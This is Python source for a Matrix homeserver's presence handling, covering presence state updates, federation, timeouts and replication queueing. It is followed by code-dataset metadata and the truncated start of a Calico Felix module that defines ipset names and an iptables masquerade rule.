prev_state.copy_and_replace(
state=PresenceState.ONLINE,
last_active_ts=sync_time_msec,
last_user_sync_ts=sync_time_msec,
)
)
else:
updates.append(
prev_state.copy_and_replace(last_user_sync_ts=sync_time_msec)
)
process_presence.add(user_id)
elif user_id in process_presence:
updates.append(
prev_state.copy_and_replace(last_user_sync_ts=sync_time_msec)
)
if not is_syncing:
process_presence.discard(user_id)
if updates:
await self._update_states(updates)
self.external_process_last_updated_ms[process_id] = self.clock.time_msec()
async def update_external_syncs_clear(self, process_id: str) -> None:
"""Marks all users that had been marked as syncing by a given process
as offline.
Used when the process has stopped/disappeared.
"""
with (await self.external_sync_linearizer.queue(process_id)):
process_presence = self.external_process_to_current_syncs.pop(
process_id, set()
)
prev_states = await self.current_state_for_users(process_presence)
time_now_ms = self.clock.time_msec()
await self._update_states(
[
prev_state.copy_and_replace(last_user_sync_ts=time_now_ms)
for prev_state in prev_states.values()
]
)
self.external_process_last_updated_ms.pop(process_id, None)
async def current_state_for_user(self, user_id: str) -> UserPresenceState:
"""Get the current presence state for a user."""
res = await self.current_state_for_users([user_id])
return res[user_id]
async def _persist_and_notify(self, states: List[UserPresenceState]) -> None:
"""Persist states in the database, poke the notifier and send to
interested remote servers
"""
stream_id, max_token = await self.store.update_presence(states)
parties = await get_interested_parties(self.store, self.presence_router, states)
room_ids_to_states, users_to_states = parties
self.notifier.on_new_event(
"presence_key",
stream_id,
rooms=room_ids_to_states.keys(),
users=[UserID.from_string(u) for u in users_to_states],
)
# We only want to poke the local federation sender, if any, as other
# workers will receive the presence updates via the presence replication
# stream (which is updated by `store.update_presence`).
await self.maybe_send_presence_to_interested_destinations(states)
async def incoming_presence(self, origin: str, content: JsonDict) -> None:
"""Called when we receive a `m.presence` EDU from a remote server."""
if not self._presence_enabled:
return
now = self.clock.time_msec()
updates = []
for push in content.get("push", []):
# A "push" contains a list of presence that we are probably interested
# in.
user_id = push.get("user_id", None)
if not user_id:
logger.info(
"Got presence update from %r with no 'user_id': %r", origin, push
)
continue
if get_domain_from_id(user_id) != origin:
logger.info(
"Got presence update from %r with bad 'user_id': %r",
origin,
user_id,
)
continue
presence_state = push.get("presence", None)
if not presence_state:
logger.info(
"Got presence update from %r with no 'presence_state': %r",
origin,
push,
)
continue
new_fields = {"state": presence_state, "last_federation_update_ts": now}
last_active_ago = push.get("last_active_ago", None)
if last_active_ago is not None:
new_fields["last_active_ts"] = now - last_active_ago
new_fields["status_msg"] = push.get("status_msg", None)
new_fields["currently_active"] = push.get("currently_active", False)
prev_state = await self.current_state_for_user(user_id)
updates.append(prev_state.copy_and_replace(**new_fields))
if updates:
federation_presence_counter.inc(len(updates))
await self._update_states(updates)
async def set_state(
self,
target_user: UserID,
state: JsonDict,
ignore_status_msg: bool = False,
force_notify: bool = False,
) -> None:
"""Set the presence state of the user.
Args:
target_user: The ID of the user to set the presence state of.
state: The presence state as a JSON dictionary.
ignore_status_msg: True to ignore the "status_msg" field of the `state` dict.
If False, the user's current status will be updated.
force_notify: Whether to force notification of the update to clients.
"""
status_msg = state.get("status_msg", None)
presence = state["presence"]
valid_presence = (
PresenceState.ONLINE,
PresenceState.UNAVAILABLE,
PresenceState.OFFLINE,
PresenceState.BUSY,
)
if presence not in valid_presence or (
presence == PresenceState.BUSY and not self._busy_presence_enabled
):
raise SynapseError(400, "Invalid presence state")
user_id = target_user.to_string()
prev_state = await self.current_state_for_user(user_id)
new_fields = {"state": presence}
if not ignore_status_msg:
new_fields["status_msg"] = status_msg
if presence == PresenceState.ONLINE or (
presence == PresenceState.BUSY and self._busy_presence_enabled
):
new_fields["last_active_ts"] = self.clock.time_msec()
await self._update_states(
[prev_state.copy_and_replace(**new_fields)], force_notify=force_notify
)
async def is_visible(self, observed_user: UserID, observer_user: UserID) -> bool:
"""Returns whether a user can see another user's presence."""
observer_room_ids = await self.store.get_rooms_for_user(
observer_user.to_string()
)
observed_room_ids = await self.store.get_rooms_for_user(
observed_user.to_string()
)
if observer_room_ids & observed_room_ids:
return True
return False
async def get_all_presence_updates(
self, instance_name: str, last_id: int, current_id: int, limit: int
) -> Tuple[List[Tuple[int, list]], int, bool]:
"""
Gets a list of presence update rows from between the given stream ids.
Each row has:
- stream_id(str)
- user_id(str)
- state(str)
- last_active_ts(int)
- last_federation_update_ts(int)
- last_user_sync_ts(int)
- status_msg(int)
- currently_active(int)
Args:
instance_name: The writer we want to fetch updates from. Unused
here since there is only ever one writer.
last_id: The token to fetch updates from. Exclusive.
current_id: The token to fetch updates up to. Inclusive.
limit: The requested limit for the number of rows to return. The
function may return more or fewer rows.
Returns:
A tuple consisting of: the updates, a token to use to fetch
subsequent updates, and whether we returned fewer rows than exists
between the requested tokens due to the limit.
The token returned can be used in a subsequent call to this
function to get further updates.
The updates are a list of 2-tuples of stream ID and the row data
"""
# TODO(markjh): replicate the unpersisted changes.
# This could use the in-memory stores for recent changes.
rows = await self.store.get_all_presence_updates(
instance_name, last_id, current_id, limit
)
return rows
def notify_new_event(self) -> None:
"""Called when new events have happened. Handles users and servers
joining rooms and require being sent presence.
"""
if self._event_processing:
return
async def _process_presence() -> None:
assert not self._event_processing
self._event_processing = True
try:
await self._unsafe_process()
finally:
self._event_processing = False
run_as_background_process("presence.notify_new_event", _process_presence)
async def _unsafe_process(self) -> None:
# Loop round handling deltas until we're up to date
while True:
with Measure(self.clock, "presence_delta"):
room_max_stream_ordering = self.store.get_room_max_stream_ordering()
if self._event_pos == room_max_stream_ordering:
return
logger.debug(
"Processing presence stats %s->%s",
self._event_pos,
room_max_stream_ordering,
)
max_pos, deltas = await self.store.get_current_state_deltas(
self._event_pos, room_max_stream_ordering
)
# We may get multiple deltas for different rooms, but we want to
# handle them on a room by room basis, so we batch them up by
# room.
deltas_by_room: Dict[str, List[JsonDict]] = {}
for delta in deltas:
deltas_by_room.setdefault(delta["room_id"], []).append(delta)
for room_id, deltas_for_room in deltas_by_room.items():
await self._handle_state_delta(room_id, deltas_for_room)
self._event_pos = max_pos
# Expose current event processing position to prometheus
synapse.metrics.event_processing_positions.labels("presence").set(
max_pos
)
async def _handle_state_delta(self, room_id: str, deltas: List[JsonDict]) -> None:
"""Process current state deltas for the room to find new joins that need
to be handled.
"""
# Sets of newly joined users. Note that if the local server is
# joining a remote room for the first time we'll see both the joining
# user and all remote users as newly joined.
newly_joined_users = set()
for delta in deltas:
assert room_id == delta["room_id"]
typ = delta["type"]
state_key = delta["state_key"]
event_id = delta["event_id"]
prev_event_id = delta["prev_event_id"]
logger.debug("Handling: %r %r, %s", typ, state_key, event_id)
# Drop any event that isn't a membership join
if typ != EventTypes.Member:
continue
if event_id is None:
# state has been deleted, so this is not a join. We only care about
# joins.
continue
event = await self.store.get_event(event_id, allow_none=True)
if not event or event.content.get("membership") != Membership.JOIN:
# We only care about joins
continue
if prev_event_id:
prev_event = await self.store.get_event(prev_event_id, allow_none=True)
if (
prev_event
and prev_event.content.get("membership") == Membership.JOIN
):
# Ignore changes to join events.
continue
newly_joined_users.add(state_key)
if not newly_joined_users:
# If nobody has joined then there's nothing to do.
return
# We want to send:
# 1. presence states of all local users in the room to newly joined
# remote servers
# 2. presence states of newly joined users to all remote servers in
# the room.
#
# TODO: Only send presence states to remote hosts that don't already
# have them (because they already share rooms).
# Get all the users who were already in the room, by fetching the
# current users in the room and removing the newly joined users.
users = await self.store.get_users_in_room(room_id)
prev_users = set(users) - newly_joined_users
# Construct sets for all the local users and remote hosts that were
# already in the room
prev_local_users = []
prev_remote_hosts = set()
for user_id in prev_users:
if self.is_mine_id(user_id):
prev_local_users.append(user_id)
else:
prev_remote_hosts.add(get_domain_from_id(user_id))
# Similarly, construct sets for all the local users and remote hosts
# that were *not* already in the room. Care needs to be taken with the
# calculating the remote hosts, as a host may have already been in the
# room even if there is a newly joined user from that host.
newly_joined_local_users = []
newly_joined_remote_hosts = set()
for user_id in newly_joined_users:
if self.is_mine_id(user_id):
newly_joined_local_users.append(user_id)
else:
host = get_domain_from_id(user_id)
if host not in prev_remote_hosts:
newly_joined_remote_hosts.add(host)
# Send presence states of all local users in the room to newly joined
# remote servers. (We actually only send states for local users already
# in the room, as we'll send states for newly joined local users below.)
if prev_local_users and newly_joined_remote_hosts:
local_states = await self.current_state_for_users(prev_local_users)
# Filter out old presence, i.e. offline presence states where
# the user hasn't been active for a week. We can change this
# depending on what we want the UX to be, but at the least we
# should filter out offline presence where the state is just the
# default state.
now = self.clock.time_msec()
states = [
state
for state in local_states.values()
if state.state != PresenceState.OFFLINE
or now - state.last_active_ts < 7 * 24 * 60 * 60 * 1000
or state.status_msg is not None
]
self._federation_queue.send_presence_to_destinations(
destinations=newly_joined_remote_hosts,
states=states,
)
# Send presence states of newly joined users to all remote servers in
# the room
if newly_joined_local_users and (
prev_remote_hosts or newly_joined_remote_hosts
):
local_states = await self.current_state_for_users(newly_joined_local_users)
self._federation_queue.send_presence_to_destinations(
destinations=prev_remote_hosts | newly_joined_remote_hosts,
states=list(local_states.values()),
)
def should_notify(old_state: UserPresenceState, new_state: UserPresenceState) -> bool:
"""Decides if a presence state change should be sent to interested parties."""
if old_state == new_state:
return False
if old_state.status_msg != new_state.status_msg:
notify_reason_counter.labels("status_msg_change").inc()
return True
if old_state.state != new_state.state:
notify_reason_counter.labels("state_change").inc()
state_transition_counter.labels(old_state.state, new_state.state).inc()
return True
if old_state.state == PresenceState.ONLINE:
if new_state.currently_active != old_state.currently_active:
notify_reason_counter.labels("current_active_change").inc()
return True
if (
new_state.last_active_ts - old_state.last_active_ts
> LAST_ACTIVE_GRANULARITY
):
# Only notify about last active bumps if we're not currently active
if not new_state.currently_active:
notify_reason_counter.labels("last_active_change_online").inc()
return True
elif new_state.last_active_ts - old_state.last_active_ts > LAST_ACTIVE_GRANULARITY:
# Always notify for a transition where last active gets bumped.
notify_reason_counter.labels("last_active_change_not_online").inc()
return True
return False
def format_user_presence_state(
state: UserPresenceState, now: int, include_user_id: bool = True
) -> JsonDict:
"""Convert UserPresenceState to a JSON format that can be sent down to clients
and to other servers.
Args:
state: The user presence state to format.
now: The current timestamp since the epoch in ms.
include_user_id: Whether to include `user_id` in the returned dictionary.
As this function can be used both to format presence updates for client /sync
responses and for federation /send requests, only the latter needs the include
the `user_id` field.
Returns:
A JSON dictionary with the following keys:
* presence: The presence state as a str.
* user_id: Optional. Included if `include_user_id` is truthy. The canonical
Matrix ID of the user.
* last_active_ago: Optional. Included if `last_active_ts` is set on `state`.
The timestamp that the user was last active.
* status_msg: Optional. Included if `status_msg` is set on `state`. The user's
status.
* currently_active: Optional. Included only if `state.state` is "online".
Example:
{
"presence": "online",
"user_id": "@alice:example.com",
"last_active_ago": 16783813918,
"status_msg": "Hello world!",
"currently_active": True
}
"""
content: JsonDict = {"presence": state.state}
if include_user_id:
content["user_id"] = state.user_id
if state.last_active_ts:
content["last_active_ago"] = now - state.last_active_ts
if state.status_msg:
content["status_msg"] = state.status_msg
if state.state == PresenceState.ONLINE:
content["currently_active"] = state.currently_active
return content
class PresenceEventSource(EventSource[int, UserPresenceState]):
def __init__(self, hs: "HomeServer"):
# We can't call get_presence_handler here because there's a cycle:
#
# Presence -> Notifier -> PresenceEventSource -> Presence
#
# Same with get_presence_router:
#
# AuthHandler -> Notifier -> PresenceEventSource -> ModuleApi -> AuthHandler
self.get_presence_handler = hs.get_presence_handler
self.get_presence_router = hs.get_presence_router
self.clock = hs.get_clock()
self.store = hs.get_datastore()
@log_function
async def get_new_events(
self,
user: UserID,
from_key: Optional[int],
limit: Optional[int] = None,
room_ids: Optional[Collection[str]] = None,
is_guest: bool = False,
explicit_room_id: Optional[str] = None,
include_offline: bool = True,
service: Optional[ApplicationService] = None,
) -> Tuple[List[UserPresenceState], int]:
# The process for getting presence events are:
# 1. Get the rooms the user is in.
# 2. Get the list of user in the rooms.
# 3. Get the list of users that are in the user's presence list.
# 4. If there is a from_key set, cross reference the list of users
# with the `presence_stream_cache` to see which ones we actually
# need to check.
# 5. Load current state for the users.
#
# We don't try and limit the presence updates by the current token, as
# sending down the rare duplicate is not a concern.
user_id = user.to_string()
stream_change_cache = self.store.presence_stream_cache
with Measure(self.clock, "presence.get_new_events"):
if from_key is not None:
from_key = int(from_key)
# Check if this user should receive all current, online user presence. We only
# bother to do this if from_key is set, as otherwise the user will receive all
# user presence anyways.
if await self.store.should_user_receive_full_presence_with_token(
user_id, from_key
):
# This user has been specified by a module to receive all current, online
# user presence. Removing from_key and setting include_offline to false
# will do effectively this.
from_key = None
include_offline = False
max_token = self.store.get_current_presence_token()
if from_key == max_token:
# This is necessary as due to the way stream ID generators work
# we may get updates that have a stream ID greater than the max
# token (e.g. max_token is N but stream generator may return
# results for N+2, due to N+1 not having finished being
# persisted yet).
#
# This is usually fine, as it just means that we may send down
# some presence updates multiple times. However, we need to be
# careful that the sync stream either actually does make some
# progress or doesn't return, otherwise clients will end up
# tight looping calling /sync due to it immediately returning
# the same token repeatedly.
#
# Hence this guard where we just return nothing so that the sync
# doesn't return. C.f. #5503.
return [], max_token
# Figure out which other users this user should receive updates for
users_interested_in = await self._get_interested_in(user, explicit_room_id)
# We have a set of users that we're interested in the presence of. We want to
# cross-reference that with the users that have actually changed their presence.
# Check whether this user should see all user updates
if users_interested_in == PresenceRouter.ALL_USERS:
# Provide presence state for all users
presence_updates = await self._filter_all_presence_updates_for_user(
user_id, include_offline, from_key
)
return presence_updates, max_token
# Make mypy happy. users_interested_in should now be a set
assert not isinstance(users_interested_in, str)
# The set of users that we're interested in and that have had a presence update.
# We'll actually pull the presence updates for these users at the end.
interested_and_updated_users: Union[Set[str], FrozenSet[str]] = set()
if from_key:
# First get all users that have had a presence update
updated_users = stream_change_cache.get_all_entities_changed(from_key)
# Cross-reference users we're interested in with those that have had updates.
# Use a slightly-optimised method for processing smaller sets of updates.
if updated_users is not None and len(updated_users) < 500:
# For small deltas, it's quicker to get all changes and then
# cross-reference with the users we're interested in
get_updates_counter.labels("stream").inc()
for other_user_id in updated_users:
if other_user_id in users_interested_in:
# mypy thinks this variable could be a FrozenSet as it's possibly set
# to one in the `get_entities_changed` call below, and `add()` is not
# method on a FrozenSet. That doesn't affect us here though, as
# `interested_and_updated_users` is clearly a set() above.
interested_and_updated_users.add(other_user_id) # type: ignore
else:
# Too many possible updates. Find all users we can see and check
# if any of them have changed.
get_updates_counter.labels("full").inc()
interested_and_updated_users = (
stream_change_cache.get_entities_changed(
users_interested_in, from_key
)
)
else:
# No from_key has been specified. Return the presence for all users
# this user is interested in
interested_and_updated_users = users_interested_in
# Retrieve the current presence state for each user
users_to_state = await self.get_presence_handler().current_state_for_users(
interested_and_updated_users
)
presence_updates = list(users_to_state.values())
if not include_offline:
# Filter out offline presence states
presence_updates = self._filter_offline_presence_state(presence_updates)
return presence_updates, max_token
async def _filter_all_presence_updates_for_user(
self,
user_id: str,
include_offline: bool,
from_key: Optional[int] = None,
) -> List[UserPresenceState]:
"""
Computes the presence updates a user should receive.
First pulls presence updates from the database. Then consults PresenceRouter
for whether any updates should be excluded by user ID.
Args:
user_id: The User ID of the user to compute presence updates for.
include_offline: Whether to include offline presence states from the results.
from_key: The minimum stream ID of updates to pull from the database
before filtering.
Returns:
A list of presence states for the given user to receive.
"""
if from_key:
# Only return updates since the last sync
updated_users = self.store.presence_stream_cache.get_all_entities_changed(
from_key
)
if not updated_users:
updated_users = []
# Get the actual presence update for each change
users_to_state = await self.get_presence_handler().current_state_for_users(
updated_users
)
presence_updates = list(users_to_state.values())
if not include_offline:
# Filter out offline states
presence_updates = self._filter_offline_presence_state(presence_updates)
else:
users_to_state = await self.store.get_presence_for_all_users(
include_offline=include_offline
)
presence_updates = list(users_to_state.values())
# TODO: This feels wildly inefficient, and it's unfortunate we need to ask the
# module for information on a number of users when we then only take the info
# for a single user
# Filter through the presence router
users_to_state_set = await self.get_presence_router().get_users_for_states(
presence_updates
)
# We only want the mapping for the syncing user
presence_updates = list(users_to_state_set[user_id])
# Return presence information for all users
return presence_updates
def _filter_offline_presence_state(
self, presence_updates: Iterable[UserPresenceState]
) -> List[UserPresenceState]:
"""Given an iterable containing user presence updates, return a list with any offline
presence states removed.
Args:
presence_updates: Presence states to filter
Returns:
A new list with any offline presence states removed.
"""
return [
update
for update in presence_updates
if update.state != PresenceState.OFFLINE
]
def get_current_key(self) -> int:
return self.store.get_current_presence_token()
@cached(num_args=2, cache_context=True)
async def _get_interested_in(
self,
user: UserID,
explicit_room_id: Optional[str] = None,
cache_context: Optional[_CacheContext] = None,
) -> Union[Set[str], str]:
"""Returns the set of users that the given user should see presence
updates for.
Args:
user: The user to retrieve presence updates for.
explicit_room_id: The users that are in the room will be returned.
Returns:
A set of user IDs to return presence updates for, or "ALL" to return all
known updates.
"""
user_id = user.to_string()
users_interested_in = set()
users_interested_in.add(user_id) # So that we receive our own presence
# cache_context isn't likely to ever be None due to the @cached decorator,
# but we can't have a non-optional argument after the optional argument
# explicit_room_id either. Assert cache_context is not None so we can use it
# without mypy complaining.
assert cache_context
# Check with the presence router whether we should poll additional users for
# their presence information
additional_users = await self.get_presence_router().get_interested_users(
user.to_string()
)
if additional_users == PresenceRouter.ALL_USERS:
# If the module requested that this user see the presence updates of *all*
# users, then simply return that instead of calculating what rooms this
# user shares
return PresenceRouter.ALL_USERS
# Add the additional users from the router
users_interested_in.update(additional_users)
# Find the users who share a room with this user
users_who_share_room = await self.store.get_users_who_share_room_with_user(
user_id, on_invalidate=cache_context.invalidate
)
users_interested_in.update(users_who_share_room)
if explicit_room_id:
user_ids = await self.store.get_users_in_room(
explicit_room_id, on_invalidate=cache_context.invalidate
)
users_interested_in.update(user_ids)
return users_interested_in
def handle_timeouts(
user_states: List[UserPresenceState],
is_mine_fn: Callable[[str], bool],
syncing_user_ids: Set[str],
now: int,
) -> List[UserPresenceState]:
"""Checks the presence of users that have timed out and updates as
appropriate.
Args:
user_states: List of UserPresenceState's to check.
is_mine_fn: Function that returns if a user_id is ours
syncing_user_ids: Set of user_ids with active syncs.
now: Current time in ms.
Returns:
List of UserPresenceState updates
"""
changes = {} # Actual changes we need to notify people about
for state in user_states:
is_mine = is_mine_fn(state.user_id)
new_state = handle_timeout(state, is_mine, syncing_user_ids, now)
if new_state:
changes[state.user_id] = new_state
return list(changes.values())
def handle_timeout(
state: UserPresenceState, is_mine: bool, syncing_user_ids: Set[str], now: int
) -> Optional[UserPresenceState]:
"""Checks the presence of the user to see if any of the timers have elapsed
Args:
state
is_mine: Whether the user is ours
syncing_user_ids: Set of user_ids with active syncs.
now: Current time in ms.
Returns:
A UserPresenceState update or None if no update.
"""
if state.state == PresenceState.OFFLINE:
# No timeouts are associated with offline states.
return None
changed = False
user_id = state.user_id
if is_mine:
if state.state == PresenceState.ONLINE:
if now - state.last_active_ts > IDLE_TIMER:
# Currently online, but last activity ages ago so auto
# idle
state = state.copy_and_replace(state=PresenceState.UNAVAILABLE)
changed = True
elif now - state.last_active_ts > LAST_ACTIVE_GRANULARITY:
# So that we send down a notification that we've
# stopped updating.
changed = True
if now - state.last_federation_update_ts > FEDERATION_PING_INTERVAL:
# Need to send ping to other servers to ensure they don't
# timeout and set us to offline
changed = True
# If there are have been no sync for a while (and none ongoing),
# set presence to offline
if user_id not in syncing_user_ids:
# If the user has done something recently but hasn't synced,
# don't set them as offline.
sync_or_active = max(state.last_user_sync_ts, state.last_active_ts)
if now - sync_or_active > SYNC_ONLINE_TIMEOUT:
state = state.copy_and_replace(state=PresenceState.OFFLINE)
changed = True
else:
# We expect to be poked occasionally by the other side.
# This is to protect against forgetful/buggy servers, so that
# no one gets stuck online forever.
if now - state.last_federation_update_ts > FEDERATION_TIMEOUT:
# The other side seems to have disappeared.
state = state.copy_and_replace(state=PresenceState.OFFLINE)
changed = True
return state if changed else None
def handle_update(
prev_state: UserPresenceState,
new_state: UserPresenceState,
is_mine: bool,
wheel_timer: WheelTimer,
now: int,
) -> Tuple[UserPresenceState, bool, bool]:
"""Given a presence update:
1. Add any appropriate timers.
2. Check if we should notify anyone.
Args:
prev_state
new_state
is_mine: Whether the user is ours
wheel_timer
now: Time now in ms
Returns:
3-tuple: `(new_state, persist_and_notify, federation_ping)` where:
- new_state: is the state to actually persist
- persist_and_notify: whether to persist and notify people
- federation_ping: whether we should send a ping over federation
"""
user_id = new_state.user_id
persist_and_notify = False
federation_ping = False
# If the users are ours then we want to set up a bunch of timers
# to time things out.
if is_mine:
if new_state.state == PresenceState.ONLINE:
# Idle timer
wheel_timer.insert(
now=now, obj=user_id, then=new_state.last_active_ts + IDLE_TIMER
)
active = now - new_state.last_active_ts < LAST_ACTIVE_GRANULARITY
new_state = new_state.copy_and_replace(currently_active=active)
if active:
wheel_timer.insert(
now=now,
obj=user_id,
then=new_state.last_active_ts + LAST_ACTIVE_GRANULARITY,
)
if new_state.state != PresenceState.OFFLINE:
# User has stopped syncing
wheel_timer.insert(
now=now,
obj=user_id,
then=new_state.last_user_sync_ts + SYNC_ONLINE_TIMEOUT,
)
last_federate = new_state.last_federation_update_ts
if now - last_federate > FEDERATION_PING_INTERVAL:
# Been a while since we've poked remote servers
new_state = new_state.copy_and_replace(last_federation_update_ts=now)
federation_ping = True
else:
wheel_timer.insert(
now=now,
obj=user_id,
then=new_state.last_federation_update_ts + FEDERATION_TIMEOUT,
)
# Check whether the change was something worth notifying about
if should_notify(prev_state, new_state):
new_state = new_state.copy_and_replace(last_federation_update_ts=now)
persist_and_notify = True
return new_state, persist_and_notify, federation_ping
async def get_interested_parties(
store: DataStore, presence_router: PresenceRouter, states: List[UserPresenceState]
) -> Tuple[Dict[str, List[UserPresenceState]], Dict[str, List[UserPresenceState]]]:
"""Given a list of states return which entities (rooms, users)
are interested in the given states.
Args:
store: The homeserver's data store.
presence_router: A module for augmenting the destinations for presence updates.
states: A list of incoming user presence updates.
Returns:
A 2-tuple of `(room_ids_to_states, users_to_states)`,
with each item being a dict of `entity_name` -> `[UserPresenceState]`
"""
room_ids_to_states: Dict[str, List[UserPresenceState]] = {}
users_to_states: Dict[str, List[UserPresenceState]] = {}
for state in states:
room_ids = await store.get_rooms_for_user(state.user_id)
for room_id in room_ids:
room_ids_to_states.setdefault(room_id, []).append(state)
# Always notify self
users_to_states.setdefault(state.user_id, []).append(state)
# Ask a presence routing module for any additional parties if one
# is loaded.
router_users_to_states = await presence_router.get_users_for_states(states)
# Update the dictionaries with additional destinations and state to send
for user_id, user_states in router_users_to_states.items():
users_to_states.setdefault(user_id, []).extend(user_states)
return room_ids_to_states, users_to_states
async def get_interested_remotes(
store: DataStore,
presence_router: PresenceRouter,
states: List[UserPresenceState],
) -> Dict[str, Set[UserPresenceState]]:
"""Given a list of presence states figure out which remote servers
should be sent which.
All the presence states should be for local users only.
Args:
store: The homeserver's data store.
presence_router: A module for augmenting the destinations for presence updates.
states: A list of incoming user presence updates.
Returns:
A map from destinations to presence states to send to that destination.
"""
hosts_and_states: Dict[str, Set[UserPresenceState]] = {}
# First we look up the rooms each user is in (as well as any explicit
# subscriptions), then for each distinct room we look up the remote
# hosts in those rooms.
room_ids_to_states, users_to_states = await get_interested_parties(
store, presence_router, states
)
for room_id, states in room_ids_to_states.items():
user_ids = await store.get_users_in_room(room_id)
hosts = {get_domain_from_id(user_id) for user_id in user_ids}
for host in hosts:
hosts_and_states.setdefault(host, set()).update(states)
for user_id, states in users_to_states.items():
host = get_domain_from_id(user_id)
hosts_and_states.setdefault(host, set()).update(states)
return hosts_and_states
class PresenceFederationQueue:
"""Handles sending ad hoc presence updates over federation, which are *not*
due to state updates (that get handled via the presence stream), e.g.
federation pings and sending existing present states to newly joined hosts.
Only the last N minutes will be queued, so if a federation sender instance
is down for longer then some updates will be dropped. This is OK as presence
is ephemeral, and so it will self correct eventually.
On workers the class tracks the last received position of the stream from
replication, and handles querying for missed updates over HTTP replication,
c.f. `get_current_token` and `get_replication_rows`.
"""
# How long to keep entries in the queue for. Workers that are down for
# longer than this duration will miss out on older updates.
_KEEP_ITEMS_IN_QUEUE_FOR_MS = 5 * 60 * 1000
# How often to check if we can expire entries from the queue.
_CLEAR_ITEMS_EVERY_MS = 60 * 1000
def __init__(self, hs: "HomeServer", presence_handler: BasePresenceHandler):
self._clock = hs.get_clock()
self._notifier = hs.get_notifier()
self._instance_name = hs.get_instance_name()
self._presence_handler = presence_handler
self._repl_client = ReplicationGetStreamUpdates.make_client(hs)
# Should we keep a queue of recent presence updates? We only bother if
# another process may be handling federation sending.
self._queue_presence_updates = True
# Whether this instance is a presence writer.
self._presence_writer = self._instance_name in hs.config.worker.writers.presence
# The FederationSender instance, if this process sends federation traffic directly.
self._federation = None
if hs.should_send_federation():
self._federation = hs.get_federation_sender()
# We don't bother queuing up presence states if only this instance
# is sending federation.
if hs.config.worker.federation_shard_config.instances == [
self._instance_name
]:
self._queue_presence_updates = False
# The queue of recently queued updates as tuples of: `(timestamp,
# stream_id, destinations, user_ids)`. We don't store the full states
# for efficiency, and remote workers will already have the full states
# cached.
self._queue: List[Tuple[int, int, Collection[str], Set[str]]] = []
self._next_id = 1
# Map from instance name to current token
self._current_tokens: Dict[str, int] = {}
if self._queue_presence_updates:
self._clock.looping_call(self._clear_queue, self._CLEAR_ITEMS_EVERY_MS)
def _clear_queue(self) -> None:
"""Clear out older entries from the queue."""
clear_before = self._clock.time_msec() - self._KEEP_ITEMS_IN_QUEUE_FOR_MS
# The queue is sorted by timestamp, so we can bisect to find the right
# place to purge before. Note that we are searching using a 1-tuple with
# the time, which does The Right Thing since the queue is a tuple where
# the first item is a timestamp.
index = bisect(self._queue, (clear_before,))
self._queue = self._queue[index:]
def send_presence_to_destinations(
self, states: Collection[UserPresenceState], destinations: Collection[str]
) -> None:
"""Send the presence states to the given destinations.
Will forward to the local federation sender (if there is one) and queue
to send over replication (if there are other federation sender instances.).
Must only be called on the presence writer process.
"""
# This should only be called on a presence writer.
assert self._presence_writer
if self._federation:
self._federation.send_presence_to_destinations(
states=states,
destinations=destinations,
)
if not self._queue_presence_updates:
return
now = self._clock.time_msec()
stream_id = self._next_id
self._next_id += 1
self._queue.append((now, stream_id, destinations, {s.user_id for s in states}))
self._notifier.notify_replication()
def get_current_token(self, instance_name: str) -> int:
"""Get the current position of the stream.
On workers this returns the last stream ID received from replication.
"""
if instance_name == self._instance_name:
return self._next_id - 1
else:
return self._current_tokens.get(instance_name, 0)
async def get_replication_rows(
self,
instance_name: str,
from_token: int,
upto_token: int,
target_row_count: int,
) -> Tuple[List[Tuple[int, Tuple[str, str]]], int, bool]:
"""Get all the updates between the two tokens.
We return rows in the form of `(destination, user_id)` to keep the size
of each row bounded (rather than returning the sets in a row).
On workers this will query the presence writer process via HTTP replication.
"""
if instance_name != self._instance_name:
# If not local we query over http replication from the presence
# writer
result = await self._repl_client(
instance_name=instance_name,
stream_name=PresenceFederationStream.NAME,
from_token=from_token,
upto_token=upto_token,
)
return result["updates"], result["upto_token"], result["limited"]
# If the from_token is the current token then there's nothing to return
# and we can trivially no-op.
if from_token == self._next_id - 1:
return [], upto_token, False
# We can find the correct position in the queue by noting that there is
# exactly one entry per stream ID, and that the last entry has an ID of
# `self._next_id - 1`, so we can count backwards from the end.
#
# Since we are returning all states in the range `from_token < stream_id
# <= upto_token` we look for the index with a `stream_id` of `from_token
# + 1`.
#
# Since the start of the queue is periodically truncated we need to
# handle the case where `from_token` stream ID has already been dropped.
start_idx = max(from_token + 1 - self._next_id, -len(self._queue))
to_send: List[Tuple[int, Tuple[str, str]]] = []
limited = False
new_id = upto_token
for _, stream_id, destinations, user_ids in self._queue[start_idx:]:
if stream_id <= from_token:
# Paranoia check that we are actually only sending states that
# are have stream_id strictly greater than from_token. We should
# never hit this.
logger.warning(
"Tried returning presence federation stream ID: %d less than from_token: %d (next_id: %d, len: %d)",
stream_id,
from_token,
self._next_id,
len(self._queue),
)
continue
if stream_id > upto_token:
break
new_id = stream_id
to_send.extend(
(stream_id, (destination, user_id))
for destination in destinations
for user_id in user_ids
)
if len(to_send) > target_row_count:
limited = True
break
return to_send, new_id, limited
async def process_replication_rows(
self, stream_name: str, instance_name: str, token: int, rows: list
) -> None:
if stream_name != PresenceFederationStream.NAME:
return
# We keep track of the current tokens (so that we can catch up with anything we missed after a disconnect)
self._current_tokens[instance_name] = token
# If we're a federation sender we pull out the presence states to send
# and forward them on.
if not self._federation:
return
hosts_to_users: Dict[str, Set[str]] = {}
for row in rows:
hosts_to_users.setdefault(row.destination, set()).add(row.user_id)
for host, user_ids in hosts_to_users.items():
states = await self._presence_handler.current_state_for_users(user_ids)
self._federation.send_presence_to_destinations(
states=states.values(),
destinations=[host],
)
| 39.241516
| 120
| 0.630263
|
f81aeeec280f77bc24902490501e04982a13ac5c
| 4,474
|
py
|
Python
|
calico/felix/masq.py
|
robbrockbank/felix
|
3429099d677bec0caa3dd9b8d69d1553304741ca
|
[
"Apache-2.0"
] | null | null | null |
calico/felix/masq.py
|
robbrockbank/felix
|
3429099d677bec0caa3dd9b8d69d1553304741ca
|
[
"Apache-2.0"
] | null | null | null |
calico/felix/masq.py
|
robbrockbank/felix
|
3429099d677bec0caa3dd9b8d69d1553304741ca
|
[
"Apache-2.0"
] | 1
|
2016-12-02T12:08:32.000Z
|
2016-12-02T12:08:32.000Z
|
# Copyright (c) Metaswitch Networks 2015. All rights reserved.
import logging
from calico.felix.actor import Actor, actor_message
from calico.felix.futils import IPV4, IPV6
from calico.felix.ipsets import Ipset, FELIX_PFX
_log = logging.getLogger(__name__)
ALL_POOLS_SET_NAME = FELIX_PFX + "all-ipam-pools"
MASQ_POOLS_SET_NAME = FELIX_PFX + "masq-ipam-pools"
MASQ_RULE_FRAGMENT = ("POSTROUTING "
"--match set --match-set %s src "
"--match set ! --match-set %s dst "
